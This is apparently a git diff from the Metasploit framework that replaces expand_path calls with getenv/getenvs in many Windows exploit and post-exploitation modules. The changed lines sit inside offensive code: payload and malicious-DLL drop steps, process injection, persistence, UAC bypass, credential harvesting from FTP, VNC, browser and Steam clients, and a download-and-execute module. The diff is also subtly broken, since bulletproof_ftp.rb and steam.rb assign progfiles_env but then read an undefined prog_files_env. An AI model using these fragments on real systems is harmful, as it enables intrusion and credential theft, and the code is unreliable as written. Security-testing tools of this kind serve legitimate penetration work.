problems with railgun when trying # use GetTokenInformation def low_integrity_level? - tmp_dir = expand_path("%TEMP%") + tmp_dir = session.sys.config.getenv('TEMP') cd(tmp_dir) new_dir = "#{rand_text_alpha(5)}" begin diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index e6a48947bc..8d0a442e2a 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local if datastore["WritableDir"] and not datastore["WritableDir"].empty? temp_dir = datastore["WritableDir"] else - temp_dir = expand_path("%TEMP%") + temp_dir = client.sys.config.getenv('TEMP') end print_status("Using #{temp_dir} to drop malicious DLL...") diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 93e282aabf..01482ce127 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local if datastore["PATH"] payload_path = datastore["PATH"] else - payload_path = session.fs.file.expand_path("%TEMP%") + payload_path = session.sys.config.getenv('TEMP') end cmd_location = "#{payload_path}\\#{payload_filename}" diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb index a9c0103521..8c59d96585 100644 --- a/modules/exploits/windows/local/bypassuac.rb +++ b/modules/exploits/windows/local/bypassuac.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local end - def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index a89fc57d3c..c8f090f42c 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local # Build a random name for the share and directory share_name = Rex::Text.rand_text_alphanumeric(8) - drive = session.fs.file.expand_path("%SYSTEMDRIVE%") + drive = session.sys.config.getenv('SYSTEMDRIVE') share_dir = "#{drive}\\#{share_name}" # Create them diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index 8628be003b..840c47a0cf 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local cmd = datastore["CMD"] || nil upload_fn = nil - tempdir = session.fs.file.expand_path("%TEMP%") + tempdir = session.sys.config.getenv('TEMP') if not cmd # Get the exe payload. exe = generate_payload_exe @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local # Create a new task to do our bidding, but make sure it doesn't run. # taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8)) - sysdir = session.fs.file.expand_path("%SystemRoot%") + sysdir = session.sys.config.getenv('SystemRoot') taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}" print_status("Creating task: #{taskname}") diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 92f2e46e3c..6a3e1d215c 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local end def low_integrity_level? - tmp_dir = expand_path("%USERPROFILE%") + tmp_dir = session.sys.config.getenv('USERPROFILE') cd(tmp_dir) new_dir = "#{rand_text_alpha(5)}" begin @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local if datastore['TECHNIQUE'] == 'FILE' payload_file = "#{rand_text_alpha(5+rand(3))}.exe" begin - tmp_dir = expand_path("%TEMP%") + tmp_dir = session.sys.config.getenv('TEMP') tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i cd(tmp_dir) print_status("Trying to drop payload to #{tmp_dir}...") @@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local # Spawn low integrity cmd.exe print_status("Spawning Low Integrity Cmd Prompt") - windir = client.fs.file.expand_path("%windir%") + windir = session.sys.config.getenv('windir') li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid count = count_cmd_procs diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index cef0f217a2..54ad50127b 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local end def create_proc - windir = expand_path("%windir%") + windir = session.sys.config.getenv('windir') cmd = "#{windir}\\System32\\notepad.exe" # run hidden begin diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 5e4c70798b..e79fb0c096 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local print_status("Launching notepad to host the exploit...") - windir = expand_path("%windir%") + windir = session.sys.config.getenv('windir') cmd = "#{windir}\\SysWOW64\\notepad.exe" process = client.sys.process.execute(cmd, nil, {'Hidden' => true}) host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 655e2ae244..0b7a26f357 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc() - windir = client.fs.file.expand_path("%windir%") + windir = client.sys.config.getenv('windir') # Select path of executable to run depending the architecture if @payload_arch.first== "x86" and client.platform =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 811b1190a3..9ce47a82fc 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local # Writes script to target host def write_script_to_target(vbs,name) - tempdir = expand_path("%TEMP%") + tempdir = session.sys.config.getenv('TEMP') if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 264f3e991e..5fc33f62a6 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local def check os = sysinfo["OS"] if os =~ /windows/i - file_path = expand_path("%windir%") << "\\system32\\win32k.sys" + file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys" major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}") diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 7572b24d1a..07df848e19 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local # Returns path for XML and payload def generate_path(rexename) # Generate a path to write payload and XML - path = datastore['PATH'] || expand_path("%TEMP%") + path = datastore['PATH'] || session.sys.config.getenv('TEMP') xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 98e3490a9d..49e5938474 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw) - sysdir = session.fs.file.expand_path("%SystemRoot%") - tmpdir = session.fs.file.expand_path("%TEMP%") + dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP') + sysdir = dir_env['SystemRoot'] + tmpdir = dir_env['TEMP'] print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..") begin @@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local moved = false configed = false #default path, but there should be an ImagePath registry key - source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe") + source = "#{sysdir}\\system32\\#{serv}.exe" #get path to exe; parse out quotes and arguments sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s sourcemaybe = session.fs.file.expand_path(sourceorig) diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 9d9b612caf..7d62ff1bee 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed} end end - win_temp = client.fs.file.expand_path("%TEMP%") + win_temp = client.sys.config.getenv('TEMP') win_file = "#{win_temp}\\#{payload_exe}" print_status("Attempting to delete #{win_file} ...") client.shell_command_token(%Q|attrib.exe -r #{win_file}|) diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index 8365e94ac2..7f485d3c94 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote begin print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...") - windir = client.fs.file.expand_path("%WINDIR%") + windir = client.sys.config.getenv('WINDIR') client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs") print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...") cmd = "#{windir}\\system32\\attrib.exe -r " + diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index 238b71aef4..652c37be25 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin - windir = session.fs.file.expand_path("%WINDIR%") + windir = session.sys.config.getenv('WINDIR') win_file = "#{windir}\\system32\\#{win_file}" # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index c1470ed799..71dd963b7f 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post end def exists_exe?(exe) - path = expand_path("$PATH") + path = session.sys.config.getenv("PATH") if path.nil? or path.empty? return false end diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 9691aeb2e4..dd6771d393 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post paths = enum_users_unix when /win/ @platform = :windows - drive = session.fs.file.expand_path("%SystemDrive%") + drive = session.sys.config.getenv('SystemDrive') os = session.sys.config.sysinfo['OS'] if os =~ /Windows 7|Vista|2008/ @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else session.shell_command("whoami").chomp end diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 0e138c3680..c7efcf42d5 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment") output = [] var_names.delete(nil) - var_names.flatten.uniq.sort.each do |v| - # Emulate the output of set and env, e.g. VAR=VALUE - output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}" + session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v| + output << "#{k}=#{v}" end @output = output.join("\n") @ltype = "windows.environment" diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 85f85f7e17..f9c6b9cf58 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else session.shell_command("whoami").chomp end diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index 1c7fd888e7..0b39193458 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post def get_ff_and_loot_path @paths = {} check_paths = [] - drive = expand_path("%SystemDrive%") loot_file = Rex::Text::rand_text_alpha(6) + ".txt" case @platform @@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post print_error("You need root privileges on this platform for DECRYPT option") return false end - tmpdir = expand_path("%TEMP%") + "\\" + env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive') + tmpdir = env_vars['TEMP'] + "\\" + drive = env_vars['SystemDrive'] # this way allows for more independent use of meterpreter # payload (32 and 64 bit) and cleaner code check_paths << drive + '\\Program Files\\Mozilla Firefox\\' @@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - return session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else - return session.shell_command("whoami").chomp + session.shell_command("whoami").chomp end end end diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 66bce0a72c..3f5974cb64 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post def whoami if @platform == :windows - session.fs.file.expand_path("%USERNAME%") + session.sys.config.getenv('USERNAME') else session.shell_command("whoami").chomp end diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index 07ff62c480..5f36dcb138 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post base = "/Users/#{user}/Library/Thunderbird/Profiles/" when /win/ if session.type =~ /meterpreter/ - user_profile = session.fs.file.expand_path("%APPDATA%") + user_profile = session.sys.config.getenv('APPDATA') else user_profile = cmd_exec("echo %APPDATA%").strip end diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index a3f7a1c3cb..38e2a691bb 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -176,7 +176,7 @@ EOS ring0_code.gsub!('TPTP', [pid].pack('V')) # Create the malicious Keyboard Layout file... - tmpdir = session.fs.file.expand_path("%TEMP%") + tmpdir = session.sys.config.getenv('TEMP') fname = "p0wns.boom" dllpath = "#{tmpdir}\\#{fname}" fd = session.fs.file.new(dllpath, 'wb') diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index ee8fdd957c..4f71b271c1 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post paths = [] services = [] vuln = "" - @temp = session.fs.file.expand_path("%TEMP%") + @temp = session.sys.config.getenv('TEMP') if init_railgun() == :error return diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index 11f2db0653..fb253f037c 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb @@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post print_status("Searching BulletProof FTP Client installation directory...") # BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files - program_files_x86 = expand_path('%ProgramFiles(X86)%') - if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/ - program_files = program_files_x86 #x64 + progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles') + progfilesx86 = prog_files_env['ProgramFiles(X86)'] + if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/ + program_files = progfilesx86 # x64 else - program_files = expand_path('%ProgramFiles%') #x86 + program_files = progfiles_env['ProgramFiles'] # x86 end + session.fs.dir.foreach(program_files) do |dir| if dir =~ /BulletProof FTP Client/ vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}") diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index ea254450da..e562129d68 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post return end - drive = session.fs.file.expand_path("%SystemDrive%") + drive = session.sys.config.getenv('SystemDrive') case session.platform when /win64/i @progs = drive + '\\Program Files (x86)\\' @@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post end def whoami - return session.fs.file.expand_path("%USERNAME%") + return session.sys.config.getenv('USERNAME') end end diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index e5f045fd59..9a0fafa782 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb @@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post # Steam client is only 32 bit so we need to know what arch we are on so that we can use # the correct program files folder. # We will just use an x64 only defined env variable to check. - if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/ - progs = expand_path('%ProgramFiles(X86)%') #x64 + progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles') + progfilesx86 = prog_files_env['ProgramFiles(X86)'] + if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/ + progs = progfilesx86 # x64 else - progs = expand_path('%ProgramFiles%') #x86 + progs = progfiles_env['ProgramFiles'] # x86 end path = progs + '\\Steam\\config' diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index bca7b022b6..3a30aae1d3 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post def get_config_files # Determine if TortoiseSVN is installed and parse config files savedpwds = 0 - user_appdata = session.fs.file.expand_path("%APPDATA%") - path = user_appdata + '\\Subversion\\auth\\svn.simple\\' + path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\") print_status("Checking for configuration files in: #{path}") begin diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index 20f506fba8..3b91655a30 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post end def check_systemroot - winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini' + winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini") check_other(winpath) end diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 953348cb82..c728cc4e0d 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post locations = [] #Checks - locations << {:name => 'UltraVNC', - :check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini', - :pass_variable => 'passwd=', - :viewonly_variable => 'passwd2=', - :port_variable => 'PortNumber='} + progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)') + progfiles_env.each do |k, v| + next if v.blank? + locations << {:name => 'UltraVNC', + :check_file => "#{v}\\UltraVNC\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} + end locations << {:name => 'WinVNC3_HKLM', :check_reg => 'HKLM\\Software\\ORL\\WinVNC3', diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index cf08f7bba5..fc8d61fb18 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post def run print_status("Looking for WinSCP.ini file storage...") - get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini') + get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini")) print_status("Looking for Registry Storage...") get_reg() print_status("Done!") diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index a30e887857..547614c390 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post user = session.sys.config.getuid userpath = nil useroffcpath = nil - sysdrv = session.fs.file.expand_path("%SystemDrive%") + env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME') + sysdrv = env_vars['SystemDrive'] if os =~ /Windows 7|Vista|2008/ userpath = sysdrv + "\\Users\\" lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" @@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post userinfo = {} end else - uservar = session.fs.file.expand_path("%USERNAME%") + uservar = env_vars['USERNAME'] userinfo['username'] = uservar userinfo['userpath'] = userpath + uservar + lnkpath userinfo['useroffcpath'] = userpath + uservar + officelnkpath diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 06ee91d28f..ef990c7abc 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post host = session.session_host #Get Google Chrome user data path - sysdrive = expand_path("%SYSTEMDRIVE%").strip + env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME') + sysdrive = env_vars['SYSTEMDRIVE'].strip if directory?("#{sysdrive}\\Users") @profiles_path = "#{sysdrive}/Users" @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default" @@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post else uid = session.sys.config.getuid print_status "Running as user '#{uid}'..." - usernames << expand_path("%USERNAME%").strip + usernames << env_vars['USERNAME'].strip end has_sqlite3 = true diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 8160a19af3..ae291ca0e8 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post return results end - windir = session.fs.file.expand_path("%windir%") + windir = session.sys.config.getenv('windir') getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1) data = nil @@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post elsif exist?(val_location + "\\my.cnf") data = read_file(val_location + "\\my.cnf") else - sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%") + sysdriv=session.sys.config.getenv('SYSTEMDRIVE') getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1) getfile.each do |file| if exist?("#{file['path']}\\#{file['name']}") diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb index 60c6c3a20e..3079bc053a 100644 --- a/modules/post/windows/gather/enum_files.rb +++ b/modules/post/windows/gather/enum_files.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post def download_files(location, file_type) - sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%") + sysdriv = client.sys.config.getenv('SYSTEMDRIVE') sysnfo = client.sys.config.sysinfo['OS'] profile_path_old = sysdriv + "\\Documents and Settings\\" profile_path_new = sysdriv + "\\Users\\" diff --git a/modules/post/windows/gather/enum_ie.rb b/modules/post/windows/gather/enum_ie.rb index 09e06862e0..5711bcc5fd 100644 --- a/modules/post/windows/gather/enum_ie.rb +++ b/modules/post/windows/gather/enum_ie.rb @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post xp_c = "\\Cookies\\index.dat" h_paths = [] c_paths = [] - base = session.fs.file.expand_path("%USERPROFILE%") + base = session.sys.config.getenv('USERPROFILE') if host['OS'] =~ /(Windows 7|2008|Vista)/ h_paths << base + vist_h h_paths << base + vist_hlow diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 1107e15974..32a69e0faa 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post users = [] user = session.sys.config.getuid path4users = "" - sysdrv = session.fs.file.expand_path("%SystemDrive%") + env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME') + sysdrv = env_vars['SystemDrive'] if os =~ /Windows 7|Vista|2008/ path4users = sysdrv + "\\Users\\" @@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post end else userinfo = {} - uservar = session.fs.file.expand_path("%USERNAME%") + uservar = env_vars['USERNAME'] userinfo['username'] = uservar userinfo['userappdata'] = path4users + uservar + profilepath users << userinfo @@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post end if powershell_version =~ /2./ print_status("Powershell Modules:") - powershell_module_path = session.fs.file.expand_path("%PSModulePath%") + powershell_module_path = session.sys.config.getenv('PSModulePath') session.fs.dir.foreach(powershell_module_path) do |m| next if m =~ /^(\.|\.\.)$/ print_status("\t#{m}") diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index 81ca4376a6..c513be790e 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post print_prefetch_key_value print_timezone_key_values(key_value) print_good("Current UTC Time: %s" % Time.now.utc) - sys_root = expand_path("%SYSTEMROOT%") + sys_root = session.sys.config.getenv('SYSTEMROOT') full_path = sys_root + "\\Prefetch\\" file_type = "*.pf" print_status("Gathering information from remote system. This will take awhile..") diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 66a4f04aae..3f6fb95e9d 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post # Initialize all 7 possible paths for the answer file # def init_paths - drive = session.fs.file.expand_path("%SystemDrive%") + drive = session.sys.config.getenv('SystemDrive') files = [ diff --git a/modules/post/windows/manage/download_exec.rb b/modules/post/windows/manage/download_exec.rb index 6dd6668288..bb5cbbb115 100644 --- a/modules/post/windows/manage/download_exec.rb +++ b/modules/post/windows/manage/download_exec.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post register_advanced_options( [ OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]), - OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]), + OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]), OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]), ], self.class) @@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post url = datastore["URL"] filename = datastore["FILENAME"] || url.split('/').last - download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"]) - if download_path.nil? or download_path.empty? - path = session.fs.file.expand_path("%TEMP%") + path = datastore['DOWNLOAD_PATH'] + if path.blank? + path = session.sys.config.getenv('TEMP') else - path = download_path + path = session.fs.file.expand_path(path) end outpath = path + '\\' + filename exec = datastore['EXECUTE'] - exec_string = datastore['EXEC_STRING'] || '' + exec_string = datastore['EXEC_STRING'] output = datastore['OUTPUT'] remove = datastore['DELETE'] @@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post # Execute file upon request if exec begin - cmd = "#{outpath} #{exec_string}" - - # If we don't have the following gsub, we get this error in Windows: - # "Operation failed: The system cannot find the file specified" - cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ') + cmd = "\"#{outpath}\" #{exec_string}" print_status("Executing file: #{cmd}") res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT']) diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index 8b3c9f2862..21bced57ef 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -87,7 +87,7 